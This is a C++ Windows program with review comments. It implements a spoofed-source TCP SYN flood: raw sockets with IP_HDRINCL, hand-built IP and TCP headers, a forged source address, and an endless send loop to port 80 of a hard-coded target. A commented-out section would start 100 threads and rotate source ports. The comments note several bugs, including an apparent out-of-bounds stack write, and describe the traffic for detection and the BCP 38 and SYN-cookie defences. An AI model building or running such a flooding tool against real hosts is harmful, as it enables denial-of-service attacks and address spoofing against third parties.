#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wsock32.lib")
///////////////////////// IP header //////////////////////
/*
 * IPv4 header without options, filled in by hand in flood() because the
 * socket is opened raw and IP_HDRINCL is set in main().
 * NOTE(review): no packing pragma is visible; the code relies on
 * sizeof(IP_HEADER) for the header-length nibble and for buffer offsets.
 * Presumably 20 bytes with the default alignment of these types - confirm.
 */
typedef struct IPH
{
unsigned char v_and_l;          // version in the high nibble, header length in 32-bit words in the low nibble
unsigned char tos;              // type of service
unsigned short total_len;       // total datagram length (flood() stores IP header size + TCP header size)
unsigned short ident;           // identification
unsigned short frag_and_flags;  // flags and fragment offset
unsigned char ttl;              // time to live
unsigned char proto;            // payload protocol (flood() stores IPPROTO_TCP)
unsigned short checksum;        // header checksum
unsigned int sourceIP;          // source address as returned by inet_addr()
unsigned int destIP;            // destination address as returned by inet_addr()
}IP_HEADER;
//-------------------------------------------------------------
///////////////// TCP header //////////////////
/*
 * TCP header without options. The commented-out OPT member shows that an
 * options word was considered and left out.
 * NOTE(review): as with IP_HEADER, the layout depends on default struct
 * alignment; flood() derives the data-offset nibble from sizeof(TCP_HEADER).
 */
typedef struct tcphdr
{
USHORT SRCPORT;       // source port
USHORT DSTPORT;       // destination port
unsigned int TSEQ;    // sequence number
unsigned int TACK;    // acknowledgement number
unsigned char TLEN;   // data offset in 32-bit words, kept in the high nibble
unsigned char TFLG;   // flag bits (flood() stores 2, the SYN bit)
USHORT TWIN;          // window size
USHORT TSUM;          // checksum
USHORT TURG;          // urgent pointer
// int OPT;
}TCP_HEADER;
//--------------------------------------------------------------
/////////////////////// TCP pseudo-header, used only for the checksum ////////////////////
/*
 * Pseudo-header that flood() copies in front of the TCP header before calling
 * checksum(). It is never placed in the outgoing buffer.
 * NOTE(review): saddr/daddr are `unsigned long`, which is 32 bits with the
 * Windows toolchains this file targets but 64 bits on LP64 platforms, where
 * this struct would no longer match the 12-byte pseudo-header layout.
 */
typedef struct PSDH
{
unsigned long saddr;   // source address, copied from IP_HEADER.sourceIP
unsigned long daddr;   // destination address, copied from IP_HEADER.destIP
char mbz;              // "must be zero" byte
char ptcl;             // protocol (flood() stores IPPROTO_TCP)
unsigned short tcpl;   // TCP length (flood() stores sizeof(TCP_HEADER))
}PSD_HEADER;
//--------------------------------------------------------------
////////////////////// Checksum function and send function ///////////////////
USHORT checksum(USHORT *buffer, int size);
int flood();
//--------------------------------------------------------------
/*
 * File-scope state shared between main() and flood().
 * flood() reads sockMain, SockAddr, FakeIP, DestIP and SrcPort from here.
 * main() declares locals named ErrorCode, flag, TimeOut, FakeIpNet,
 * FakeIpHost, dataSize, SendSEQ, S_PORT, SrcPort, FakeIP, DestIP and
 * activPort that shadow the ones below, so values set inside main() are not
 * the ones flood() sees.
 * NOTE(review): `sockaddr_in` without `struct` and `true` without <stdbool.h>
 * mean this file builds as C++ rather than C.
 */
WSADATA wsaData;                  // filled in by WSAStartup() in main()
SOCKET sockMain = (SOCKET)NULL;   // raw socket created in main(), used by flood()
sockaddr_in SockAddr;             // destination passed to sendto() in flood()
int ErrorCode = -1,
flag = true,
TimeOut = 2000,
FakeIpNet,
FakeIpHost,
dataSize = 0,
SendSEQ = 0;
//int f;
int S_PORT = 0;
short SrcPort = 0;                // copied into the TCP source-port field by flood()
// Hard-coded addresses. FakeIP is written into the IP source field by flood(),
// i.e. the source address is chosen by the program and not taken from the
// sending interface.
// NOTE(review): 15 bytes holds these literals plus their NUL, but not a
// dotted quad with four three-digit octets, which needs 16.
char FakeIP[15] = "172.31.180.89",
DestIP[15] ="172.31.180.33";
unsigned short activPort = 40000;
/*
 * Entry point: initialise Winsock, open a raw socket with IP_HDRINCL so the
 * program supplies its own IP header, set a send timeout, fill in the
 * destination address and call flood() once on the calling thread.
 *
 * Returns 0 on every path, including the failure paths.
 *
 * NOTE(review): the three early returns sit before the __try block, so the
 * __finally cleanup does not cover them; the second and third return after a
 * successful WSAStartup() without WSACleanup(), and the third also leaves
 * sockMain open.
 */
int main()
{
////////////// Initialise the headers ////////////
// NOTE(review): IPH, TCPH and PSDH are declared here but not used in main();
// flood() declares its own.
IP_HEADER IPH;
TCP_HEADER TCPH;
PSD_HEADER PSDH;
//-----------------------------------------------------------
// hThread and dw are referenced only by the commented-out thread loop below.
HANDLE hThread[100];
DWORD dw;
// Every local from here to activPort shadows a file-scope variable of the
// same name. flood() reads the file-scope FakeIP/DestIP/SrcPort, not these.
int ErrorCode = -1,
flag = true,
TimeOut = 2000,
FakeIpNet,
FakeIpHost,
dataSize = 0,
SendSEQ = 0;
//int f;
int S_PORT = 0;
short SrcPort = 0;
// NOTE(review): this DestIP differs from the file-scope DestIP. SockAddr below
// is filled from this local, while flood() builds the IP header from the
// file-scope one.
char FakeIP[15] = "172.31.180.84",
DestIP[15] = "210.2.13.7";
unsigned short activPort = 40000;
//--------------------------------------------------------
if ((ErrorCode = WSAStartup(MAKEWORD(2, 2), &wsaData)) != 0)
{
printf("WSAStartup failed: %d\n", ErrorCode);
system("pause");
return 0;
}
// Raw IP socket: the kernel does not build the transport header for us.
sockMain = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sockMain == INVALID_SOCKET)
{
printf("Socket failed: %d\n", WSAGetLastError());
system("pause");
return 0;
}
// IP_HDRINCL: the buffer handed to sendto() starts with a caller-built IP header.
ErrorCode = setsockopt(sockMain, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
if (ErrorCode == SOCKET_ERROR)
{
printf("Set sockopt IP failed: %d\n", WSAGetLastError());
system("pause");
return 0;
}
//---------------------------------------------------------
FakeIpNet = inet_addr(FakeIP);
// NOTE(review): FakeIP is a char array, so this passes a pointer to %x;
// the format and the argument type do not match.
printf_s("%02x\n", FakeIP);
printf_s("%02x\n", FakeIpNet);
// FakeIpHost is computed here and not read again in the live code.
FakeIpHost = ntohl(FakeIpNet);
__try
{
// NOTE(review): `==` binds tighter than `=`, so ErrorCode receives the 0/1
// result of the comparison. The test against SOCKET_ERROR below can then
// never be true, and a failed SO_SNDTIMEO call goes unreported.
ErrorCode = setsockopt(sockMain, SOL_SOCKET, SO_SNDTIMEO, (char*)&TimeOut, sizeof(TimeOut)) == SOCKET_ERROR;
if (ErrorCode == SOCKET_ERROR)
{
printf("sockopt设置超时,LastError:%d\n", WSAGetLastError());
__leave;
}
// NOTE(review): with the memset commented out, only sin_family and sin_addr
// are assigned here; SockAddr is a file-scope object, so its other members
// start out zero-initialised.
//memset(&SockAddr, 0, sizeof(sockaddr));
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.s_addr = inet_addr(DestIP);
/*
for (int cf = 0; cf < 100; cf++)
{
hThread[cf] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)flood, 0, 0, &dw);
printf("proc:%d has been set!PORTNUM:%d\n", cf, ntohs(tcpheader.SRCPORT));
SetThreadPriority(hThread[cf], THREAD_PRIORITY_HIGHEST);
ResumeThread(hThread[cf]);
}
*/
// Called directly, not as a thread. flood() loops until sendto() fails and
// then calls ExitThread(), so control presumably does not come back here.
flood();
}
//----------------------------------------------
__finally
{
// Release the socket and Winsock when the guarded block is left.
if (sockMain != INVALID_SOCKET)
closesocket(sockMain);
WSACleanup();
}
return 0;
}
/*
 * 16-bit one's-complement checksum over `size` bytes starting at `buffer`.
 *
 * buffer: start of the data, read as 16-bit words in memory order.
 * size:   number of bytes to cover; a trailing odd byte is added on its own.
 * Returns the complement of the folded sum, truncated to 16 bits.
 *
 * The caller must make sure `size` bytes are readable at `buffer`; nothing
 * here bounds the reads.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    int remaining;

    /* Add up every complete 16-bit word. */
    for (remaining = size; remaining > 1; remaining -= (int)sizeof(USHORT)) {
        sum += *buffer;
        buffer++;
    }

    /* One byte left over: add it as a single unsigned byte. */
    if (remaining != 0) {
        sum += *(UCHAR *)buffer;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice. */
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (USHORT)(~sum);
}
//------------------------------------------------/////////////////
/*
 * Build one IPv4 header and one TCP header with only the SYN flag set, then
 * send that pair on the raw socket in an endless loop, pausing 500 ms between
 * sends, until sendto() fails.
 *
 * Takes no parameters; reads the file-scope FakeIP, DestIP, SrcPort, sockMain
 * and SockAddr. The `return 0` after the loop is unreachable: the loop has no
 * break and the only exit is ExitThread(1) on a send error.
 *
 * Traffic characteristics as set below, for anyone matching this in a
 * capture: IP source taken from the FakeIP constant, not from the
 * sending interface; TTL 128; TOS 2<<5; IP ident 0; TCP flags 2 (SYN only);
 * destination-port field 80; window field 16384; no payload. Multi-byte
 * fields are stored as assigned, with no byte-order conversion in the live
 * code (see the author's "maybe htons" notes), so values in a capture may
 * appear byte-swapped relative to these literals.
 * Spoofed-source SYN traffic of this kind is what source-address validation
 * at the network edge (BCP 38) and SYN cookies on the receiver are meant to
 * blunt.
 */
int flood()
{
// i and num are only changed inside the commented-out block further down, so
// both stay 0; SendSEQ, activPort and SEQ are likewise used only in
// commented-out code. ErrorCode, SendSEQ and activPort shadow file-scope names.
int i = 0, num = 0,DS,ErrorCode=-1;
short SendSEQ=0, activPort=0,SEQ=0;
UCHAR SendBuf[40];   // outgoing datagram: IP header followed by TCP header
USHORT Check[16];    // 32-byte scratch area handed to checksum()
IP_HEADER IPH = { 0 };
TCP_HEADER TCPH = { 0 };
PSD_HEADER PSDH={ 0 };
//IPH.v_and_l = (4 << 4 | sizeof(IP_HEADER) / 4);
// Low nibble: header length in 32-bit words; high nibble: IP version 4.
IPH.v_and_l = sizeof(IPH)/4;
IPH.v_and_l += (4 << 4);
// NOTE(review): sizeof yields size_t, which does not match %d.
printf("%d\n%d", sizeof(short),sizeof(char));
IPH.tos = 2<<5;
IPH.total_len = sizeof(IP_HEADER) + sizeof(TCP_HEADER);
IPH.ident = 0;//unconfirmed
IPH.frag_and_flags = 0;
IPH.ttl = 128;
IPH.proto = IPPROTO_TCP;
// Source address comes from the hard-coded FakeIP string.
IPH.sourceIP = inet_addr(FakeIP);
IPH.destIP = inet_addr(DestIP);
//---------------------------------
// IP header checksum, computed over a copy whose checksum field is still 0.
memset(Check, 0, 20);
memcpy(Check, &IPH, sizeof(IPH));
IPH.checksum = checksum(Check, sizeof(IPH));
//-0----------------------------
TCPH.DSTPORT =80;//maybe htons
TCPH.SRCPORT = SrcPort;//maybe htons
TCPH.TSEQ = 0;//maybe htons+sendseq
TCPH.TACK = 0;
// Data offset (header length in 32-bit words) goes in the high nibble.
TCPH.TLEN = 0;
TCPH.TLEN += ((sizeof(TCPH)/4) << 4);
printf("\n%d,%d", sizeof(TCPH), sizeof(TCPH.TLEN));
TCPH.TFLG = 2;   // SYN bit only
TCPH.TSUM = 0;
TCPH.TWIN = 16384;//maybe htons
TCPH.TURG = 0;
//------------------------------
// Pseudo-header: used as checksum input only, never copied into SendBuf.
PSDH.daddr = IPH.destIP;
PSDH.saddr = IPH.sourceIP;
PSDH.mbz = 0;
PSDH.ptcl = IPPROTO_TCP;
PSDH.tcpl = sizeof(TCP_HEADER);//maybe htons
//---------------------------------
memset(Check, 0, sizeof(TCPH)+sizeof(PSDH));
memcpy(Check, &PSDH, sizeof(PSDH));
while (1)
{
// NOTE(review): Check is a USHORT pointer, so `Check + sizeof(PSDH)` advances
// by that many 16-bit elements, not bytes. With a 16-element array the copy
// destination appears to run past the end of Check - an out-of-bounds stack
// write and undefined behaviour. Confirm against the actual struct sizes.
memcpy(Check + sizeof(PSDH), &TCPH, sizeof(TCPH));
TCPH.TSUM = checksum(Check, sizeof(PSDH) + sizeof(TCPH));
/*
if (SendSEQ++ == 65536) SendSEQ = 1;
if (activPort++ == 40010) activPort = 1000;
// printf("pros:%d,SendSEQ:%d,activport:%d\n", t, SendSEQ, activPort);
IPH.checksum = 0;
//TCPH.sourceIP = htonl(FakeIpHost + SendSEQ);
TCPH.TSEQ = htonl(SEQ + SendSEQ);
TCPH.SRCPORT = htons(activPort);
TCPH.TSUM = 0;
PSDH.saddr = IPH.sourceIP;
memcpy(SendBuf, &PSDH, sizeof(PSD_HEADER));
memcpy(SendBuf + sizeof(PSD_HEADER), &TCPH, sizeof(TCP_HEADER));
TCPH.TSUM = checksum((USHORT *)SendBuf, sizeof(PSD_HEADER) + sizeof(TCP_HEADER));
*/
// Assemble the datagram: IP header first, TCP header directly after it.
memcpy(SendBuf, &IPH, sizeof(IP_HEADER));
memcpy(SendBuf + sizeof(IP_HEADER), &TCPH, sizeof(TCPH));
//memset(SendBuf + sizeof(IP_HEADER) + sizeof(TCPH), 0, 4);
DS = sizeof(IPH) + sizeof(TCPH);
//IPH.checksum = checksum((USHORT *)SendBuf, DS);
//memcpy(SendBuf, &IPH, sizeof(IPH));
ErrorCode = sendto(sockMain, (char*)SendBuf, DS, 0, (struct sockaddr*) &SockAddr, sizeof(sockaddr_in));
printf("portnum:%d\n", ntohs(TCPH.SRCPORT));
if (ErrorCode == SOCKET_ERROR)
{
// i is never incremented in the live code, so this first branch is the one
// taken on any send failure; the else branch is effectively dead.
if (i == 0)
{
printf("\nCan't connect this IP!Pls check it.\n");
ExitThread(1);
}
else
{
printf("Process killed\n%d tcp quests have been sent\n\n", num);
ExitThread(1);
}
}
/*
else if (i == 0)
{
i++;
num++;
//f = num;
// printf("portnum:%d\n", ntohs(tcpheader.th_sport));
//tcpheader.th_sport = htons(++S_PORT);
TCPH.SRCPORT = htons(0);
}
else
{
num++;
//f = num;
// printf("portnum:%d\n", ntohs(tcpheader.th_sport));
//tcpheader.th_sport = htons(++S_PORT);
TCPH.SRCPORT = htons(0);
}
// printf("Errocode:%d\n", ErrorCode);
//system("pause");
*/
// NOTE(review): size_t arguments printed with %d, as above.
printf("\n%d,%d", sizeof(IPH), sizeof(TCPH));
// Half-second pause between sends.
Sleep(500);
}
return 0;
}